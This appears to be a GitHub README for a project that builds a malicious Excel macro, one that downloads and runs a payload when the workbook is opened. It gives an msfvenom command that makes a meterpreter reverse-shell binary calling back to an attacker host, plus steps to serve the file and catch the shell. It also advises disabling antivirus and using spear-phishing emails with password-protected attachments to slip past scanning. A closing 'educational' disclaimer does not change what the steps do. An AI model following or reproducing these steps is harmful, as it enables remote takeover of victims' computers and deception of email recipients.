/Excel-Malware-Maverick

Primary LanguageVBA

Excel-Malware-Maverick

This project explores how MS Excel can be used to download and execute malware.

The VBA code does the following:

When the Excel workbook is opened:

  1. It checks if Microsoft Excel is already running.
  2. If Excel is not running, it starts a new instance of Excel.
  3. It then downloads the malware (firstStageMal.exe) from the specified URL.
  4. The downloaded file is saved to a temporary location on the user's computer.
  5. Finally, it runs the downloaded exe (firstStageMal.exe) file.

You need to modify the code according to your requirements.(URL/malware binary name etc.)

Open the Macros section of the Excel workbook (Press ALT + F11) and paste the VBA code. image

Save as Excel Macro-Enabled Workbook (.xlsm)

Congrats on creating your malicious Excel macro which downloads the actual malware and executes it when user opens the excel document.

For the demonstration purposes, you can use msfvenom to create a first stage malware binary as follows,

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.8 LPORT=6969 -f exe > firstStageMal.exe

firstStageMal.exe can then be hosted via a Simple HTTP server in Kali.

Remember to establish a listener via msfconsole (exploit/multi/handler), according to your LHOST and LPORT.

In the victim machine, if the victim uses O365, macros should be enabled first via the Trust Center. image

After victim opens the excel file, it downloads the firstStageMal.exe from the HTTP server, executes it and gives a meterpreter reverse shell to the attacker. image

NOTE - This code may detect as malicious by your AV. If you are doing this for demonstration purposes, it is recommended to first disable the AV.

Initial Access Idea - You can use spear phishing email to make the user open the Excel file. Google does not scan password protected excel attachments. You can send the password in the email body while convincing the user this email is legitimate. image

Disclaimer: This project is intended for educational purposes only. The code provided is meant to demonstrate certain concepts and should not be used for any illegal activities or malicious intent. By accessing and using this code, you agree that I, as the author, will not be held responsible for any misuse or illegal use of the code or its consequences. It is your responsibility to use this code ethically and in accordance with applicable laws and regulations.